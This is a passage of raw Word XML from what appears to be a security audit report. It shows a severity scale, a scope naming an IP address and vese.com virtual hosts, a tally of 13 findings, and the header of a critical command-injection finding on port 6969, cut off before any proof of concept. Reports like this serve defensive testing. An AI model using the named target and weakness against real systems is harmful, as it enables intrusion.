      <w:tr w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="0813FAB1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="699"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0000"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="56F2DBB6" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>High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3DE3CB6E" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>7.0-8.9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386467" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="67000D88" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exploitation is more difficult but could cause elevated privileges and potentially a loss of data or downtime.  It is advised to form a plan of action and patch as soon as possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="094C7455" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="709"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C000" w:themeFill="accent4"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="01851B71" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Moderate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6A7A67EF" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>4.0-6.9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386467" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="74F22A44" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vulnerabilities exist but are not exploitable or require extra steps such as social engineering.  It is advised to form a plan of action and patch after high-priority issues have been resolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="0F821286" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="548"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  <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="55179DA5" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Low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0607A8B3" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>0.1-3.9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6EDF81C3" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vulnerabilities are non-exploitable but would reduce an organization’s attack surface.  It is advised to form a plan of action and patch during the next maintenance window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="37BF3069" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="709"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="0C0D5BC0" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Informational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778589A5" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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86467" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="58FE8849" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No vulnerability exists.  Additional information is provided regarding items noticed during testing, strong controls, and additional documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="25787AB4" w14:textId="572DEC3F" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="17CD1BC9" w14:textId="5C81B635" w14:noSpellErr="1"/>
    <w:p w:rsidRPr="00E15CFC" w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="3BC737E9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc119432375" w:id="2"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="64B8BBE3" w14:textId="77777777" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="1E0CCFEE" w14:textId="77777777" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9569" w:type="dxa"/>
        <w:tblInd w:w="-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4029"/>
        <w:gridCol w:w="5540"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="3F8B2539" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="406"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4029" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0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:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="6C91967B" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5540" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0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:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="2846CF4A" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="2C7CBB1D" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="744"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4029" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D673A6" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="581FBF4B" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Security Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5540" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D673A6" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="008944EF" w14:paraId="3B67C924" w14:textId="6AFC3F6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</w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="74DF3185">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>The</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="74DF3185">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="74DF3185">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>scope</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4F7B612C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of</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="07B9AFFA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this</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="07B9AFFA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se</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="79BBB39C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>curity</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="79BBB39C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audit</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="07B9AFFA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was</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="07B9AFFA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="590E2635">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>limited</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="590E2635">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="07B9AFFA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="709EE79B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="3B8CC773">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">host machine </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="3B8CC773">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="3B8CC773">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="3B8CC773">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>of</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4C01DD75">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="6CF23693">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>13.40.34.151</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="2F75178B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="2F75178B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="2F75178B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="11FB0A15">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>the</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="11FB0A15">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="11FB0A15">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>following</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="11FB0A15">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> virtual hosts:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00D673A6" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="008944EF" w14:paraId="79B8873C" w14:textId="42E4331F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cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="11FB0A15">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>vese.com</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00D673A6" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="008944EF" w14:paraId="26634649" w14:textId="6D8D156A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cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="11FB0A15">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>contact.vese.com</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00D673A6" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="008944EF" w14:paraId="273EBA45" w14:textId="60F118E4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cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="11FB0A15">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>internal.vese.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DF6071" w:rsidP="57C4D39E" w:rsidRDefault="00DF6071" w14:paraId="6B5AF44C" w14:noSpellErr="1" w14:textId="7409764E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="43556EC6" w14:textId="75142F46">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="2BD89D38" w14:textId="589D92DD">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="34D0BDCA" w14:textId="74048A9D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00BD0B0F" w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="1539E718" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc119432376" w:id="3"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Audit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="42DD153F" w14:textId="2EBB03EE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="6D38658D" w14:textId="37AE1991">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="50EBE74D">
        <w:rPr/>
        <w:t xml:space="preserve">During security audit, total of </w:t>
      </w:r>
      <w:r w:rsidR="7B2C39BD">
        <w:rPr/>
        <w:t>13 vulnerabilities was found:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="4D0612B1" w14:textId="39F89C82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="7B2C39BD">
        <w:rPr/>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="7B2C39BD">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="6841CFC2" w14:textId="64869602">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="7B2C39BD">
        <w:rPr/>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="7B2C39BD">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>high</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="611750AA" w14:textId="3E853F6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="7B2C39BD">
        <w:rPr/>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_ED3r8QTs" w:id="1172891235"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="7B2C39BD">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="FFC000" w:themeColor="accent4" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>moderate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1172891235"/>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="69634594" w14:textId="302DC6A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="7B2C39BD">
        <w:rPr/>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="7B2C39BD">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="30B0184D" w14:textId="0E287AEA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidR="2A4ECBF7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>All vulnerabilities and proof of concepts have been detailed in the report below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="168A9488" w14:textId="16E88735">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="1AB8E439" w14:textId="51DC73D8">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection – </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>13.40.34.151:6969</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="32EF36E2" w14:textId="54982252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3A22F54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12FBDEB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Description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936F247" w14:textId="31DB33BD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Command Injection in V</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>se Pseudo-Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="134D0F0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1F092BE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9FD783C" w14:textId="0056747D">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="7DBD5D7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C99F363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System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5B15D9E" w14:textId="46CE07B3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4CF973AB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82138EC" w14:textId="577FA913">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0"/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Location: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42A2BD7" w14:textId="2A5FAABC">
            <w:pPr>
              <w:pStyle w:val="Normal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13.40.34.151:6969</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="7547E8A0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9C3BB28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References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641AF5E6" w14:textId="178208AE">
            <w:pPr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https://attack.mitre.org/techniques/T1202/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="63DDB77A" w14:textId="54982252">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="2E0EED34" w14:textId="5E8C1AE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E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37C03DE3" w14:textId="585A7A24">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
